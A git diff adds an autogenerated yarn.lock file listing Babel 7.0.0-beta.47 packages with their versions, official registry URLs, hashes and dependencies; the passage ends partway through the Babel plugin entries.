new file mode 100644
index 0000000000..370c576123
--- /dev/null
+++ b/yarn.lock
@@ -0,0 +1,6179 @@
+# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.
+# yarn lockfile v1
+
+
+"@babel/code-frame@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/code-frame/-/code-frame-7.0.0-beta.47.tgz#d18c2f4c4ba8d093a2bcfab5616593bfe2441a27"
+  dependencies:
+    "@babel/highlight" "7.0.0-beta.47"
+
+"@babel/core@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.0.0-beta.47.tgz#b9c164fb9a1e1083f067c236a9da1d7a7d759271"
+  dependencies:
+    "@babel/code-frame" "7.0.0-beta.47"
+    "@babel/generator" "7.0.0-beta.47"
+    "@babel/helpers" "7.0.0-beta.47"
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    babylon "7.0.0-beta.47"
+    convert-source-map "^1.1.0"
+    debug "^3.1.0"
+    json5 "^0.5.0"
+    lodash "^4.17.5"
+    micromatch "^2.3.11"
+    resolve "^1.3.2"
+    semver "^5.4.1"
+    source-map "^0.5.0"
+
+"@babel/generator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.0.0-beta.47.tgz#1835709f377cc4d2a4affee6d9258a10bbf3b9d1"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+    jsesc "^2.5.1"
+    lodash "^4.17.5"
+    source-map "^0.5.0"
+    trim-right "^1.0.1"
+
+"@babel/helper-annotate-as-pure@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.0.0-beta.47.tgz#354fb596055d9db369211bf075f0d5e93904d6f6"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-builder-binary-assignment-operator-visitor@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.0.0-beta.47.tgz#d5917c29ee3d68abc2c72f604bc043f6e056e907"
+  dependencies:
+    "@babel/helper-explode-assignable-expression" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-call-delegate@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-call-delegate/-/helper-call-delegate-7.0.0-beta.47.tgz#96b7804397075f722a4030d3876f51ec19d8829b"
+  dependencies:
+    "@babel/helper-hoist-variables" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-define-map@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-define-map/-/helper-define-map-7.0.0-beta.47.tgz#43a9def87c5166dc29630d51b3da9cc4320c131c"
+  dependencies:
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/helper-explode-assignable-expression@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-explode-assignable-expression/-/helper-explode-assignable-expression-7.0.0-beta.47.tgz#56b688e282a698f4d1cf135453a11ae8af870a19"
+  dependencies:
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-function-name@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-function-name/-/helper-function-name-7.0.0-beta.47.tgz#8057d63e951e85c57c02cdfe55ad7608d73ffb7d"
+  dependencies:
+    "@babel/helper-get-function-arity" "7.0.0-beta.47"
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-get-function-arity@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-get-function-arity/-/helper-get-function-arity-7.0.0-beta.47.tgz#2de04f97c14b094b55899d3fa83144a16d207510"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-hoist-variables@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-hoist-variables/-/helper-hoist-variables-7.0.0-beta.47.tgz#ce295d1d723fe22b2820eaec748ed701aa5ae3d0"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-member-expression-to-functions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.0.0-beta.47.tgz#35bfcf1d16dce481ef3dec66d5a1ae6a7d80bb45"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-module-imports@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-module-imports/-/helper-module-imports-7.0.0-beta.47.tgz#5af072029ffcfbece6ffbaf5d9984c75580f3f04"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/helper-module-transforms@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-module-transforms/-/helper-module-transforms-7.0.0-beta.47.tgz#7eff91fc96873bd7b8d816698f1a69bbc01f3c38"
+  dependencies:
+    "@babel/helper-module-imports" "7.0.0-beta.47"
+    "@babel/helper-simple-access" "7.0.0-beta.47"
+    "@babel/helper-split-export-declaration" "7.0.0-beta.47"
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/helper-optimise-call-expression@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.0.0-beta.47.tgz#085d864d0613c5813c1b7c71b61bea36f195929e"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-plugin-utils@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-plugin-utils/-/helper-plugin-utils-7.0.0-beta.47.tgz#4f564117ec39f96cf60fafcde35c9ddce0e008fd"
+
+"@babel/helper-regex@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-regex/-/helper-regex-7.0.0-beta.47.tgz#b8e3b53132c4edbb04804242c02ffe4d60316971"
+  dependencies:
+    lodash "^4.17.5"
+
+"@babel/helper-remap-async-to-generator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.0.0-beta.47.tgz#444dc362f61470bd61a745ebb364431d9ca186c2"
+  dependencies:
+    "@babel/helper-annotate-as-pure" "7.0.0-beta.47"
+    "@babel/helper-wrap-function" "7.0.0-beta.47"
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-replace-supers@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-replace-supers/-/helper-replace-supers-7.0.0-beta.47.tgz#310b206a302868a792b659455ceba27db686cbb7"
+  dependencies:
+    "@babel/helper-member-expression-to-functions" "7.0.0-beta.47"
+    "@babel/helper-optimise-call-expression" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-simple-access@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-simple-access/-/helper-simple-access-7.0.0-beta.47.tgz#234d754acbda9251a10db697ef50181eab125042"
+  dependencies:
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/helper-split-export-declaration@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.0.0-beta.47.tgz#e11277855472d8d83baf22f2d0186c4a2059b09a"
+  dependencies:
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helper-wrap-function@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helper-wrap-function/-/helper-wrap-function-7.0.0-beta.47.tgz#6528b44a3ccb4f3aeeb79add0a88192f7eb81161"
+  dependencies:
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/helpers@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/helpers/-/helpers-7.0.0-beta.47.tgz#f9b42ed2e4d5f75ec0fb2e792c173e451e8d40fd"
+  dependencies:
+    "@babel/template" "7.0.0-beta.47"
+    "@babel/traverse" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+
+"@babel/highlight@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/highlight/-/highlight-7.0.0-beta.47.tgz#8fbc83fb2a21f0bd2b95cdbeb238cf9689cad494"
+  dependencies:
+    chalk "^2.0.0"
+    esutils "^2.0.2"
+    js-tokens "^3.0.0"
+
+"@babel/plugin-proposal-async-generator-functions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-async-generator-functions/-/plugin-proposal-async-generator-functions-7.0.0-beta.47.tgz#571142284708c5ad4ec904d9aa705461a010be53"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-remap-async-to-generator" "7.0.0-beta.47"
+    "@babel/plugin-syntax-async-generators" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-class-properties@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.0.0-beta.47.tgz#08c1a1dfc92d0f5c37b39096c6fb883e1ca4b0f5"
+  dependencies:
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-replace-supers" "7.0.0-beta.47"
+    "@babel/plugin-syntax-class-properties" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-decorators@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-decorators/-/plugin-proposal-decorators-7.0.0-beta.47.tgz#5e8943c8f8eb3301f911ef0dcd3ed64cf28c723e"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-decorators" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-export-namespace-from@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-export-namespace-from/-/plugin-proposal-export-namespace-from-7.0.0-beta.47.tgz#38171dd0fd5f54aee377d338ed41bb92e25d6720"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-export-namespace-from" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-function-sent@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-function-sent/-/plugin-proposal-function-sent-7.0.0-beta.47.tgz#3ad46c04a277a887731f21843013292d254f7ba9"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-wrap-function" "7.0.0-beta.47"
+    "@babel/plugin-syntax-function-sent" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-numeric-separator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-numeric-separator/-/plugin-proposal-numeric-separator-7.0.0-beta.47.tgz#3ace5cbacb62c3fa223c3c0b66c0c16e63a8e259"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-numeric-separator" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-object-rest-spread@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.0.0-beta.47.tgz#e1529fddc88e948868ee1d0edaa27ebd9502322d"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-object-rest-spread" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-optional-catch-binding@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-optional-catch-binding/-/plugin-proposal-optional-catch-binding-7.0.0-beta.47.tgz#8c6453919537517ea773bb8f3fceda4250795efa"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-optional-catch-binding" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-throw-expressions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-throw-expressions/-/plugin-proposal-throw-expressions-7.0.0-beta.47.tgz#9a67f8b0852b4b0b255eff5d6d25fa436928424f"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-syntax-throw-expressions" "7.0.0-beta.47"
+
+"@babel/plugin-proposal-unicode-property-regex@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-unicode-property-regex/-/plugin-proposal-unicode-property-regex-7.0.0-beta.47.tgz#34d7e4811bdc4f512400bb29d01051842528c8d5"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-regex" "7.0.0-beta.47"
+    regexpu-core "^4.1.4"
+
+"@babel/plugin-syntax-async-generators@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.0.0-beta.47.tgz#8ab94852bf348badc866af85bd852221f0961256"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-class-properties@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.0.0-beta.47.tgz#de52bed12fd472c848e1562f57dd4a202fe27f11"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-decorators@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-decorators/-/plugin-syntax-decorators-7.0.0-beta.47.tgz#a42f10fcd651940bc475d93b3ac23432b4a8a293"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-dynamic-import@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-dynamic-import/-/plugin-syntax-dynamic-import-7.0.0-beta.47.tgz#ee964915014a687701ee8e15c289e31a7c899e60"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-export-namespace-from@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-export-namespace-from/-/plugin-syntax-export-namespace-from-7.0.0-beta.47.tgz#fd446c76c59849f15e6cde235b5b8e153413f21e"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-function-sent@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-function-sent/-/plugin-syntax-function-sent-7.0.0-beta.47.tgz#8d15536f55b21acdf9bfaa177c46591a589fe8b0"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-import-meta@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.0.0-beta.47.tgz#8ab5174209a954b91e327004a7d16737bcc4774d"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-jsx@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.0.0-beta.47.tgz#f3849d94288695d724bd205b4f6c3c99e4ec24a4"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-numeric-separator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.0.0-beta.47.tgz#9f06cb770a94f464b3b2889d2110080bc302fc80"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-object-rest-spread@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.0.0-beta.47.tgz#21da514d94c138b2261ca09f0dec9abadce16185"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-optional-catch-binding@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.0.0-beta.47.tgz#0b1c52b066aa36893c41450773a5adb904cd4024"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-syntax-throw-expressions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-throw-expressions/-/plugin-syntax-throw-expressions-7.0.0-beta.47.tgz#8ca197bab3534f443eecd7eb79da47e199dafaf7"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-arrow-functions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.0.0-beta.47.tgz#d6eecda4c652b909e3088f0983ebaf8ec292984b"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-async-to-generator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.0.0-beta.47.tgz#5723816ea1e91fa313a84e6ee9cc12ff31d46610"
+  dependencies:
+    "@babel/helper-module-imports" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-remap-async-to-generator" "7.0.0-beta.47"
+
+"@babel/plugin-transform-block-scoped-functions@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.0.0-beta.47.tgz#e422278e06c797b43c45f459d83c7af9d6237002"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-block-scoping@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.0.0-beta.47.tgz#b737cc58a81bea57efd5bda0baef9a43a25859ad"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/plugin-transform-classes@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-classes/-/plugin-transform-classes-7.0.0-beta.47.tgz#7aff9cbe7b26fd94d7a9f97fa90135ef20c93fb6"
+  dependencies:
+    "@babel/helper-annotate-as-pure" "7.0.0-beta.47"
+    "@babel/helper-define-map" "7.0.0-beta.47"
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/helper-optimise-call-expression" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-replace-supers" "7.0.0-beta.47"
+    "@babel/helper-split-export-declaration" "7.0.0-beta.47"
+    globals "^11.1.0"
+
+"@babel/plugin-transform-computed-properties@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.0.0-beta.47.tgz#56ef2a021769a2b65e90a3e12fd10b791da9f3e0"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-destructuring@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.0.0-beta.47.tgz#452b607775fd1c4d10621997837189efc0a6d428"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-dotall-regex@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.0.0-beta.47.tgz#d8da9b706d4bfc68dec9d565661f83e6e8036636"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-regex" "7.0.0-beta.47"
+    regexpu-core "^4.1.3"
+
+"@babel/plugin-transform-duplicate-keys@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.0.0-beta.47.tgz#4aabeda051ca3007e33a207db08f1a0cf9bd253b"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-exponentiation-operator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.0.0-beta.47.tgz#930e1abf5db9f4db5b63dbf97f3581ad0be1e907"
+  dependencies:
+    "@babel/helper-builder-binary-assignment-operator-visitor" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-for-of@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.0.0-beta.47.tgz#527d5dc24e4a4ad0fc1d0a3990d29968cb984e76"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-function-name@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.0.0-beta.47.tgz#fb443c81cc77f3206a863b730b35c8c553ce5041"
+  dependencies:
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-literals@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-literals/-/plugin-transform-literals-7.0.0-beta.47.tgz#448fad196f062163684a38f10f14e83315892e9c"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-modules-amd@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.0.0-beta.47.tgz#84564419b11c1be6b9fcd4c7b3a6737f2335aac4"
+  dependencies:
+    "@babel/helper-module-transforms" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-modules-commonjs@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.0.0-beta.47.tgz#dfe5c6d867aa9614e55f7616736073edb3aab887"
+  dependencies:
+    "@babel/helper-module-transforms" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-simple-access" "7.0.0-beta.47"
+
+"@babel/plugin-transform-modules-systemjs@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.0.0-beta.47.tgz#8514dbcdfca3345abd690059e7e8544e16ecbf05"
+  dependencies:
+    "@babel/helper-hoist-variables" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-modules-umd@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.0.0-beta.47.tgz#6dcfb9661fdd131b20b721044746a7a309882918"
+  dependencies:
+    "@babel/helper-module-transforms" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-new-target@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.0.0-beta.47.tgz#4b5cb7ce30d7bffa105a1f43ed07d6ae206a4155"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-object-super@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.0.0-beta.47.tgz#ca8e5f326c5011c879f3a6ed749e58bd10fff05d"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-replace-supers" "7.0.0-beta.47"
+
+"@babel/plugin-transform-parameters@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.0.0-beta.47.tgz#46a4236040a6552a5f165fb3ddd60368954b0ddd"
+  dependencies:
+    "@babel/helper-call-delegate" "7.0.0-beta.47"
+    "@babel/helper-get-function-arity" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-regenerator@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.0.0-beta.47.tgz#86500e1c404055fb98fc82b73b09bd053cacb516"
+  dependencies:
+    regenerator-transform "^0.12.3"
+
+"@babel/plugin-transform-runtime@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-runtime/-/plugin-transform-runtime-7.0.0-beta.47.tgz#1700938fa8710909cbf28f7dd39f9b40688b09fd"
+  dependencies:
+    "@babel/helper-module-imports" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-shorthand-properties@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.0.0-beta.47.tgz#00be44c4fad8fe2c00ed18ea15ea3c88dd519dbb"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-spread@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-spread/-/plugin-transform-spread-7.0.0-beta.47.tgz#3feadb02292ed1e9b75090d651b9df88a7ab5c50"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-sticky-regex@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.0.0-beta.47.tgz#c0aa347d76b5dc87d3b37ac016ada3f950605131"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-regex" "7.0.0-beta.47"
+
+"@babel/plugin-transform-template-literals@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.0.0-beta.47.tgz#5f7b5badf64c4c5da79026aeab03001e62a6ee5f"
+  dependencies:
+    "@babel/helper-annotate-as-pure" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-typeof-symbol@7.0.0-beta.47":
